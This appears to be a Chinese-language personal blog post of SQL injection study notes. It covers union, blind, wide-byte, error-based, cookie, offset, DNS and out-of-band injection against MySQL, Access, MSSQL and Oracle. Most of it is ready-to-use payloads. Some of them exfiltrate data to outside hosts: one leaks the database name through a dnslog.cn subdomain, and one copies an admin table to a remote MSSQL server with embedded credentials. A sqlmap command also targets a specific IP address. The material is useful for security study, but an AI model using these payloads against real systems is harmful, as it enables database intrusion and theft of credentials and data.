<!DOCTYPE html><html lang="zh-CN"><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="black-translucent" name="apple-mobile-web-app-status-bar-style"><meta content="telephone=no" name="format-detection"><meta name="description" content=""><title>SQL注入 | 云痕</title><link rel="stylesheet" type="text/css" href="/css/style.css?v=1.0.0"><link rel="stylesheet" type="text/css" href="//cdn.jsdelivr.net/npm/normalize.css/normalize.min.css"><link rel="stylesheet" type="text/css" href="//cdn.jsdelivr.net/npm/purecss/build/pure-min.min.css"><link rel="stylesheet" type="text/css" href="//cdn.jsdelivr.net/npm/purecss/build/grids-responsive-min.css"><link rel="stylesheet" href="//cdn.jsdelivr.net/npm/font-awesome@4.7.0/css/font-awesome.min.css"><script type="text/javascript" src="//cdn.jsdelivr.net/npm/jquery/dist/jquery.min.js"></script><link rel="icon" mask="" sizes="any" href="/favicon.ico"><link rel="Shortcut Icon" type="image/x-icon" href="/favicon.ico"><link rel="apple-touch-icon" href="/apple-touch-icon.png"><link rel="apple-touch-icon-precomposed" href="/apple-touch-icon.png"><link rel="alternate" type="application/atom+xml" href="/atom.xml"><script type="text/javascript" src="//cdn.jsdelivr.net/npm/clipboard/dist/clipboard.min.js"></script><script type="text/javascript" src="//cdn.jsdelivr.net/gh/codeseven/toastr/build/toastr.min.js"></script><link rel="stylesheet" href="//cdn.jsdelivr.net/gh/codeseven/toastr/build/toastr.min.css"><meta name="generator" content="Hexo 5.4.0"></head><body><div class="body_container"><div id="header"><div class="site-name"><h1 class="hidden">SQL注入</h1><a id="logo" href="/.">云痕</a><p class="description">Do the right thing.</p></div><div id="nav-menu"><a class="current" href="/."><i class="fa fa-home"> 首页</i></a><a href="/archives/"><i class="fa fa-archive"> 归档</i></a><a href="/about/"><i class="fa fa-user"> 关于</i></a><a href="/atom.xml"><i class="fa fa-rss"> 订阅</i></a></div></div><div class="pure-g" id="layout"><div class="pure-u-1 pure-u-md-3-4"><div class="content_container"><div class="post"><h1 class="post-title">SQL注入</h1><div class="post-meta">2021-03-24<span> | </span><span class="category"><a href="/categories/Web%E5%AE%89%E5%85%A8/">Web安全</a></span></div><div class="post-content"><h2 id="0x01-SQL注入原理"><a href="#0x01-SQL注入原理" class="headerlink" title="0x01 SQL注入原理"></a>0x01 SQL注入原理</h2><p>用户输入的数据被当作代码执行</p>
<h2 id="0x02-基本手工注入流程"><a href="#0x02-基本手工注入流程" class="headerlink" title="0x02 基本手工注入流程"></a>0x02 基本手工注入流程</h2><h3 id="判断注入点"><a href="#判断注入点" class="headerlink" title="判断注入点"></a>判断注入点</h3><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">数字型：<span class="attribute">id</span>=2-1、and <span class="attribute">1</span>=1、and <span class="attribute">1</span>=2、and <span class="attribute">-1</span>=-2、and 1&gt;0、<span class="keyword">or</span> <span class="attribute">1</span>=1 <span class="built_in">..</span><span class="built_in">..</span><span class="built_in">..</span></span><br><span class="line">字符型：<span class="string">&#x27;、&#x27;</span>)、<span class="string">&#x27;))、)、&quot;、&quot;)、&quot;))</span></span><br><span class="line"><span class="string">注释符：-- qwe、/**/、#</span></span><br></pre></td></tr></table></figure>

<h3 id="获取字段数"><a href="#获取字段数" class="headerlink" title="获取字段数"></a>获取字段数</h3><figure class="highlight crmsh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">order</span> <span class="title">by</span> n</span><br></pre></td></tr></table></figure>

<h3 id="查看回显点"><a href="#查看回显点" class="headerlink" title="查看回显点"></a>查看回显点</h3><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">and</span> <span class="number">1</span>=<span class="number">2</span> union select <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>,......,n</span><br></pre></td></tr></table></figure>

<h3 id="查看数据库名称-假设n是回显点"><a href="#查看数据库名称-假设n是回显点" class="headerlink" title="查看数据库名称(假设n是回显点)"></a>查看数据库名称(假设n是回显点)</h3><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">and</span> <span class="number">1</span>=<span class="number">2</span> union select <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>,......,database()</span><br></pre></td></tr></table></figure>

<h3 id="查看表名"><a href="#查看表名" class="headerlink" title="查看表名"></a>查看表名</h3><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">and</span> <span class="number">1</span>=<span class="number">2</span> union select <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>,......,table_name from information_schema.tables where table_schema = database() limit <span class="number">0</span>,<span class="number">1</span>    // limit <span class="number">0</span>,<span class="number">1</span> <span class="number">0</span>是从哪开始,<span class="number">1</span>是显示几个</span><br></pre></td></tr></table></figure>

<h3 id="查看字段名"><a href="#查看字段名" class="headerlink" title="查看字段名"></a>查看字段名</h3><figure class="highlight n1ql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">union <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>,......,column_name <span class="keyword">from</span> information_schema.columns <span class="keyword">where</span> table_schema = <span class="keyword">database</span>() <span class="keyword">and</span> table_name = <span class="string">&#x27;表名&#x27;</span> <span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span></span><br></pre></td></tr></table></figure>

<h3 id="查看字段内容"><a href="#查看字段内容" class="headerlink" title="查看字段内容"></a>查看字段内容</h3><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">union</span> select <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>,......,字段名 from 表名 limit <span class="number">0</span>,<span class="number">1</span></span><br></pre></td></tr></table></figure>

<h2 id="0x03-盲注-布尔盲注、延时盲注"><a href="#0x03-盲注-布尔盲注、延时盲注" class="headerlink" title="0x03 盲注(布尔盲注、延时盲注)"></a><strong>0x03 盲注(布尔盲注、延时盲注)</strong></h2><p>在使用and 1=1 和 and 1=2时发现可能存在注入，但是并没有回显点的时候可以尝试使用布尔盲注。</p>
<p>当使用and 1=1 和 and 1=2时发现都出现正确页面，可能存在延时盲注，需要进一步测试</p>
<h3 id="函数"><a href="#函数" class="headerlink" title="函数"></a>函数</h3><ol>
<li>length()</li>
</ol>
<p>返回字符串的长度</p>
<ol start="2">
<li>substr()</li>
</ol>
<p>截取字符串。语法：substr(str,pos,len)</p>
<ol start="3">
<li>ascii()</li>
</ol>
<p>返回字符的ascii码【将字符变为数字】</p>
<ol start="4">
<li>sleep()</li>
</ol>
<p>将程序挂起一段时间n，n为n秒</p>
<ol start="5">
<li>if(expr1,expr2,expr3)</li>
</ol>
<p>判断语句：如果第一个语句正确就执行第二个语句，否则就执行第三个语句</p>
<h3 id="布尔盲注"><a href="#布尔盲注" class="headerlink" title="布尔盲注"></a>布尔盲注</h3><ol>
<li>猜解当前数据库名称长度</li>
</ol>
<figure class="highlight isbl"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable"><span class="keyword">and</span></span> (<span class="function"><span class="title"><span class="built_in">length</span></span>(<span class="title">database</span>()))&gt;<span class="number">9</span></span></span><br></pre></td></tr></table></figure>

<ol start="2">
<li>利用ASCII码猜解当前数据库名称</li>
</ol>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">and</span> (ascii(substr(database(),<span class="number">1</span>,<span class="number">1</span>)))=<span class="number">115</span>   // 返回正常，说明数据库名称第一位是s</span><br><span class="line"><span class="attribute">and</span> (ascii(substr(database(),<span class="number">2</span>,<span class="number">1</span>)))=<span class="number">101</span>    // 返回正常，说明数据库名称第二位是e</span><br></pre></td></tr></table></figure>

<ol start="3">
<li>猜表名</li>
</ol>
<figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">and</span> (ascii((substr(<span class="keyword">select</span> <span class="built_in">table_name</span> <span class="keyword">from</span> information_schema.<span class="keyword">tables</span> <span class="keyword">where</span> table_schema=<span class="keyword">database</span>() <span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span>),<span class="number">1</span>,<span class="number">1</span>)))=<span class="number">101</span>    // 返回正常，说明数据表名的第一个第一位是e</span><br></pre></td></tr></table></figure>

<ol start="4">
<li>猜字段名</li>
</ol>
<figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">and</span> (ascii(substr((<span class="keyword">select</span> <span class="built_in">column_name</span> <span class="keyword">from</span> information.<span class="keyword">columns</span> <span class="keyword">where</span> <span class="built_in">table_name</span>=<span class="string">&#x27;表名&#x27;</span> <span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span>),<span class="number">1</span>,<span class="number">1</span>)))=<span class="number">102</span>    // 返回正常，说明表中的列名称第一位是f</span><br></pre></td></tr></table></figure>

<ol start="5">
<li>猜内容</li>
</ol>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">and</span> (ascii(substr((select 字段名 from 表名 limit <span class="number">0</span>,<span class="number">1</span>),<span class="number">1</span>,<span class="number">1</span>)))=<span class="number">122</span>    // 返回正常，说明表中列第一位是z</span><br></pre></td></tr></table></figure>

<h3 id="延时盲注"><a href="#延时盲注" class="headerlink" title="延时盲注"></a>延时盲注</h3><p>与布尔盲注类似，当注入后无论如何都没有变化时尝试，放在if()函数里面进行，通过有无延时判断是否正确</p>
<figure class="highlight lisp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">and if((<span class="name">length</span>(<span class="name">database</span>()))&gt;n,sleep(<span class="number">10</span>),<span class="number">1</span>)</span><br></pre></td></tr></table></figure>

<h2 id="0x04-宽字节注入"><a href="#0x04-宽字节注入" class="headerlink" title="0x04 宽字节注入"></a><strong>0x04 宽字节注入</strong></h2><h3 id="PHP的防御函数"><a href="#PHP的防御函数" class="headerlink" title="PHP的防御函数"></a>PHP的防御函数</h3><p>magic_quotes_gpc(魔术引号开关)使数据库无法闭合注入，PHP5.4以上取消了魔术引号，后续版本有类似功能的函数</p>
<p>这个函数的作用是在PHP中判断解析用户提交的数据，如果有post、get、cookie过来的数据就加上转义字符“\”，来确保这些数据不会引起程序特别是数据库因为特殊字符引起的污染而出现致命的错误。</p>
<p>单引号、双引号、反斜线与NULL等字符都会被加上反斜线</p>
<h3 id="遇到了魔术引号"><a href="#遇到了魔术引号" class="headerlink" title="遇到了魔术引号"></a>遇到了魔术引号</h3><ol>
<li>寻找不需要闭合的注入点</li>
<li>使用宽字节注入</li>
</ol>
<p>宽字节SQL注入主要是源于程序员设置数据库编码为非英文编码，那么就有可能产生宽字节注入</p>
<p>发现输入’注释时有\将之转义，这时在前面加一个%df可以将\合起来变成一个汉字，从而达到注释的效果。</p>
<p>通过16进制，子查询或者函数来替换有单引号的地方</p>
<ol>
<li>GET注入中在闭合符号前加上%df</li>
<li>POST注入中在闭合符号前加上汉字</li>
<li>修改brupsuite的hex中对应数的16进制值</li>
</ol>
<h2 id="0x05-报错注入-HEAD注入"><a href="#0x05-报错注入-HEAD注入" class="headerlink" title="0x05 报错注入(HEAD注入)"></a><strong>0x05 报错注入(HEAD注入)</strong></h2><h3 id="TIPS：只有知道账户密码的时候可用"><a href="#TIPS：只有知道账户密码的时候可用" class="headerlink" title="TIPS：只有知道账户密码的时候可用"></a><strong>TIPS：只有知道账户密码的时候可用</strong></h3><h3 id="PHP全局变量——超全局变量"><a href="#PHP全局变量——超全局变量" class="headerlink" title="PHP全局变量——超全局变量"></a>PHP全局变量——超全局变量</h3><p>PHP中的许多预定义变量都是”超全局的”，这意味着它们在一个脚本的全部脚本域中都可以使用。</p>
<p>超全局变量：</p>
<ul>
<li>$_REQUEST(获取GET/POST/COOKIE)COOKIE在PHP5.4版本以上已经无法获取了</li>
<li>$_POST(获取POST传参)</li>
<li>$_GET(获取GET的传参)</li>
<li>$_COOKIE(获取COOKIE的值)</li>
<li>$_SERVER(包含了诸如头信息(header)、路径(path)、以及脚本位置(script locations)等等信息的数组)功能强大</li>
</ul>
<p>常用的：</p>
<ul>
<li>$_SERVER[‘HTTP_REFERER’] 获取Referer请求头数据</li>
<li>$_SERVER[“HTTP_USER_AGENT”] 获取用户相关信息，包括用户浏览器、操作系统等信息</li>
<li>$_SERVER[“REMOTE_ADDR”] 浏览网页的用户IP</li>
</ul>
<h3 id="函数-1"><a href="#函数-1" class="headerlink" title="函数"></a>函数</h3><p>updatexml()更新xml文档的函数</p>
<p>语法：updatexml(目标xml内容，xml文档路径，更新的内容)</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">updatexml</span>(<span class="number">1</span>,concat(<span class="number">0</span>x<span class="number">7</span>e,(SELECT database()),<span class="number">0</span>x<span class="number">7</span>e),<span class="number">1</span>)</span><br><span class="line"><span class="attribute">updatexml</span>(<span class="number">1</span>,concat(<span class="number">0</span>x<span class="number">7</span>e,(SELECT table_name from information_schema.tables where table_schema = database() limit <span class="number">0</span>,<span class="number">1</span>),<span class="number">0</span>x<span class="number">7</span>e),<span class="number">1</span>)</span><br><span class="line"><span class="attribute">updatexml</span>(<span class="number">1</span>,concat(<span class="number">0</span>x<span class="number">7</span>e,(SELECT column_name from information_schema.columns where table_schema = database() and table_name = &#x27;表名&#x27; limit <span class="number">0</span>,<span class="number">1</span>),<span class="number">0</span>x<span class="number">7</span>e),<span class="number">1</span>)</span><br><span class="line"><span class="attribute">updatexml</span>(<span class="number">1</span>,concat(<span class="number">0</span>x<span class="number">7</span>e,(SELECT 字段名 from 表名 limit <span class="number">1</span>,<span class="number">1</span>),<span class="number">0</span>x<span class="number">7</span>e),<span class="number">1</span>)</span><br></pre></td></tr></table></figure>

<h3 id="PS"><a href="#PS" class="headerlink" title="PS"></a>PS</h3><ol>
<li>0x7e 实际是是16进制，Mysql支持16进制，但是开头得写0x  0x7e是一个特殊符号，然后不符合路径规则报错</li>
<li>有时可以在请求头中加上X-Forwarded-For: 进行注入</li>
</ol>
<h2 id="0x06-Cookie注入"><a href="#0x06-Cookie注入" class="headerlink" title="0x06 Cookie注入"></a>0x06 Cookie注入</h2><h3 id="and等字符被拦截的情况下，asp、aspx、php-lt-5-4-45可用"><a href="#and等字符被拦截的情况下，asp、aspx、php-lt-5-4-45可用" class="headerlink" title="and等字符被拦截的情况下，asp、aspx、php&lt;=5.4.45可用"></a>and等字符被拦截的情况下，asp、aspx、php&lt;=5.4.45可用</h3><p>开发滥用$_REQUEST引起的，使用Cookie注入需要URL编码</p>
<p>在开发者工具中找到Cookie设置ID和值，再将get传参的?id=1删去，发现还是可以正常访问，说明存在Cookie注入。</p>
<h3 id="设置Cookie，需要URL编码"><a href="#设置Cookie，需要URL编码" class="headerlink" title="设置Cookie，需要URL编码"></a>设置Cookie，需要URL编码</h3><ol>
<li>按F12，在浏览器中修改Cookie</li>
<li>使用BrupSuite抓包修改Cookie，在后面加上; id=171发现和get传参的结果一样</li>
<li>通过Js，document.cookie=”id=”+escape(“171 order by 1”)</li>
</ol>
<p>Access查询必须后带表名，而一开始并不知道表名，union select 1,2,3,4 from 表名，这时有两个办法解决：</p>
<ul>
<li>查询系统自带库【MySQL MsSQL Oracle】都可以这样做，但是Access是淘汰的数据库，所以没办法，只能用第二个办法</li>
<li>强猜 admin news user job,但是Access数据库在使用union select时可能会出错，所以一般使用 and exists (select*from 表名)判断表名，可以利用BurpSuite跑字典跑出表名</li>
</ul>
<p>之后要查出表内内容有两个办法：</p>
<ul>
<li>强猜，猜测表内有什么字段</li>
<li>偏移注入</li>
</ul>
<h3 id="sqlmap跑Cookie注入"><a href="#sqlmap跑Cookie注入" class="headerlink" title="sqlmap跑Cookie注入"></a>sqlmap跑Cookie注入</h3><figure class="highlight dsconfig"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">sqlmap</span>.<span class="string">py</span> -<span class="string">u</span> <span class="string">&quot;http://59.63.200.79:8004/shownews.asp&quot;</span> <span class="built_in">--cookie</span> <span class="string">&quot;id=171&quot;</span> <span class="built_in">--level</span> <span class="string">2</span></span><br></pre></td></tr></table></figure>

<h2 id="0x07-偏移注入"><a href="#0x07-偏移注入" class="headerlink" title="0x07 偏移注入"></a>0x07 偏移注入</h2><h3 id="使用场景"><a href="#使用场景" class="headerlink" title="使用场景"></a>使用场景</h3><p>在SQL注入的时候会碰到一些无法查询列名的情况，比如</p>
<ul>
<li>系统自带数据库的权限不够而无法访问系统自带库。</li>
<li>当猜到表名但是无法猜到字段名的时候，可以使用偏移注入来查询表里的数据。</li>
</ul>
<p>表名.<em>：</em>在数据库中代表一切；.代表向下</p>
<h3 id="使用步骤"><a href="#使用步骤" class="headerlink" title="使用步骤"></a>使用步骤</h3><figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>,<span class="keyword">admin</span>.* <span class="keyword">from</span> <span class="keyword">admin</span>    // 放在不同的回显点显示不同的字段的内容，回显点包含在<span class="keyword">admin</span>.*内</span><br><span class="line"><span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="keyword">admin</span>.*,<span class="number">10</span> <span class="keyword">from</span> <span class="keyword">admin</span></span><br></pre></td></tr></table></figure>

<h2 id="0x08-DNS注入"><a href="#0x08-DNS注入" class="headerlink" title="0x08 DNS注入"></a>0x08 DNS注入</h2><h3 id="使用场景-1"><a href="#使用场景-1" class="headerlink" title="使用场景"></a>使用场景</h3><p>无法直接利用漏洞获得回显，但是目标可以发起请求，此时就可以通过DNS请求的方法将想获得的数据外带出来。</p>
<p>核心：将盲注转化为显错注入</p>
<p>MySQL必须打开<code>secure_file_priv= </code> </p>
<h3 id="函数解析"><a href="#函数解析" class="headerlink" title="函数解析"></a>函数解析</h3><p>load_file()读取文件</p>
<figure class="highlight reasonml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">select load<span class="constructor">_file(&#x27;<span class="operator">/</span><span class="operator">/</span><span class="params">error</span>.1806dl.<span class="params">dnslog</span>.<span class="params">cn</span><span class="operator">/</span><span class="params">bc</span>&#x27;)</span>;</span><br><span class="line">select load<span class="constructor">_file(<span class="params">concat</span>(&#x27;<span class="operator">/</span><span class="operator">/</span>&#x27;,(<span class="params">select</span> <span class="params">database</span>()</span>),&#x27;.<span class="number">1806</span>dl.dnslog.cn/bc&#x27;));</span><br></pre></td></tr></table></figure>

<p>dnslog.cn   // 网站</p>
<h2 id="0x9-反弹注入"><a href="#0x9-反弹注入" class="headerlink" title="0x9 反弹注入"></a><strong>0x9 反弹注入</strong></h2><h3 id="使用场景-2"><a href="#使用场景-2" class="headerlink" title="使用场景"></a>使用场景</h3><p>页面没东西显示的盲注</p>
<p>明明是SQL的注入点却无发进行注入，注入工具猜解的速度异常缓慢，错误提示信息关闭，无法返回注入结果等，这些都是在注入攻击中常常遇到的问题。为了解决这些问题，比较好的解决方法是使用反弹注入技术，而反弹注入技术需要依靠opendatasource函数。</p>
<p>反弹注入就是把查询出来的数据发送到我们的MSSQL数据库上，此时就需要自己的MSSQL数据库和一个公网IP。</p>
<h3 id="显错注入"><a href="#显错注入" class="headerlink" title="显错注入"></a>显错注入</h3><ol>
<li>猜字段</li>
<li>联合查询，要写union all select</li>
<li>输出点要用null填充</li>
<li>注释只有–+</li>
<li>sysobjects查询系统表 union all select id,name,null from sysobjects where xtype =U –+</li>
<li>syscolumns字段 union all select id,name,null from syscolumns where id=id –+</li>
<li>查询信息 union all select id,passwd,token from admin –+</li>
</ol>
<h3 id="反弹注入"><a href="#反弹注入" class="headerlink" title="反弹注入"></a>反弹注入</h3><figure class="highlight n1ql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#x27;;<span class="keyword">insert</span> <span class="keyword">into</span> opendatasource(<span class="string">&#x27;sqloledb&#x27;</span>,<span class="string">&#x27;server=den1.mssql8.gear.host,1433;uid=xyzxyz;pwd=Ct27!_nXWji4;database=xyzxyz&#x27;</span>).xyzxyz.dbo.test <span class="keyword">select</span> * <span class="keyword">from</span> admin --</span><br></pre></td></tr></table></figure>

<h2 id="0x10-报错注入"><a href="#0x10-报错注入" class="headerlink" title="0x10 报错注入"></a>0x10 报错注入</h2><h3 id="Orcale可用"><a href="#Orcale可用" class="headerlink" title="Orcale可用"></a>Orcale可用</h3><p>dual是一个虚表，直接查询他只显示一个X，列名为dummy</p>
<p>dual实际上是为了满足查询语句的结构产生的</p>
<p>查询用户名：select user from dual</p>
<p>调用系统函数：(获得随机值：select dbms_random.random from dual)</p>
<p>做加减法： select 9+1 from dual</p>
<p>查询出所有的表：union all select * from all_tables</p>
<p>查询出当前用户的表：select * from user_tables</p>
<p>查询出所有的字段：select * from all_tab_columns</p>
<p>查询出当前用户的字段：select * from user_tab_columns</p>
<p>查版本：select * from v$version</p>
<p>rownum=1 (限制查询返回的总行数为一条)</p>
<p>Oracle中&lt;&gt;和!=都是不等于</p>
<p>to_nchar()转换进制</p>
<h3 id="报错注入"><a href="#报错注入" class="headerlink" title="报错注入"></a>报错注入</h3><p>不用管有没有输出点</p>
<p>不用管数据类型</p>
<p>不用管字段数</p>
<figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ctxsys.drithsx.sn(<span class="keyword">user</span>,(<span class="keyword">select</span> banner <span class="keyword">from</span> v$<span class="keyword">version</span> <span class="keyword">where</span> rownum = <span class="number">1</span>))</span><br></pre></td></tr></table></figure>

<p>查询关于主题的对应关键词，然后因为查询失败爆出想要查询的内容</p>
<figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">and</span> <span class="number">1</span>=ctxsys.drithsx.sn(<span class="number">1</span>,(<span class="keyword">select</span> <span class="built_in">table_name</span> <span class="keyword">from</span> user_tables <span class="keyword">where</span> rownum=<span class="number">1</span> <span class="keyword">and</span> <span class="built_in">table_name</span>&lt;&gt;<span class="string">&#x27;NEWS&#x27;</span>))</span><br></pre></td></tr></table></figure>

</div><div class="tags"><a href="/tags/Web%E5%AE%89%E5%85%A8/"><i class="fa fa-tag"></i>Web安全</a></div><div class="post-nav"><a class="pre" href="/2021/03/24/XSS/">XSS</a><a class="next" href="/2021/03/24/%E7%BA%B2%E8%A6%81/">纲要</a></div></div></div></div><div class="pure-u-1-4 hidden_mid_and_down"><div id="sidebar"><div class="widget"><div class="widget-title"><i class="fa fa-folder-o"> 分类</i></div><ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/Linux/">Linux</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/Mac/">Mac</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/Python/">Python</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/Web%E5%AE%89%E5%85%A8/">Web安全</a></li></ul></div><div class="widget"><div class="widget-title"><i class="fa fa-star-o"> 标签</i></div><div class="tagcloud"><a href="/tags/Docker/" style="font-size: 15px;">Docker</a> <a href="/tags/Web%E5%AE%89%E5%85%A8/" style="font-size: 15px;">Web安全</a> <a href="/tags/Linux/" style="font-size: 15px;">Linux</a> <a href="/tags/Mac/" style="font-size: 15px;">Mac</a> <a href="/tags/Python/" style="font-size: 15px;">Python</a></div></div><div class="widget"><div class="widget-title"><i class="fa fa-file-o"> 最近文章</i></div><ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2021/07/07/Web%E8%BF%90%E8%A1%8C%E5%9F%BA%E7%A1%80%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA/">Web运行基础环境搭建</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/07/05/LNMP%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA/">LNMP环境搭建</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/03/26/%E6%9C%AC%E5%9C%B0%E5%8C%85%E5%90%AB%E4%B8%8E%E8%BF%9C%E7%A8%8B%E5%8C%85%E5%90%AB/">本地包含与远程包含</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/03/26/unserialize%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/">unserialize反序列化漏洞</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/03/26/%E5%8F%98%E9%87%8F%E8%A6%86%E7%9B%96%E6%BC%8F%E6%B4%9E/">变量覆盖漏洞</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/03/25/XXE/">XXE</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/03/25/SSRF/">SSRF</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/03/25/%E6%94%AF%E4%BB%98%E6%BC%8F%E6%B4%9E/">支付漏洞</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/03/25/%E8%B6%8A%E6%9D%83/">越权</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/03/24/%E9%AA%8C%E8%AF%81%E7%A0%81%E7%BB%95%E8%BF%87%E3%80%81%E5%AF%86%E7%A0%81%E6%89%BE%E5%9B%9E%E6%BC%8F%E6%B4%9E/">验证码绕过、密码找回漏洞</a></li></ul></div><div class="widget"><div class="widget-title"><i class="fa fa-external-link"> 友情链接</i></div></div></div></div><div class="pure-u-1 pure-u-md-3-4"><div id="footer">Copyright © 2021 <a href="/." rel="nofollow">云痕</a></div></div></div><script type="text/javascript" src="//cdn.jsdelivr.net/gh/fancyapps/fancybox/dist/jquery.fancybox.min.js" async></script><script type="text/javascript" src="/js/fancybox.js?v=1.0.0" async></script><link rel="stylesheet" type="text/css" href="//cdn.jsdelivr.net/gh/fancyapps/fancybox/dist/jquery.fancybox.min.css"><script type="text/javascript" src="/js/copycode.js" successtext="复制成功!"></script><link rel="stylesheet" type="text/css" href="/css/copycode.css"><script type="text/javascript" src="/js/codeblock-resizer.js?v=1.0.0"></script><script type="text/javascript" src="/js/smartresize.js?v=1.0.0"></script></div></body></html>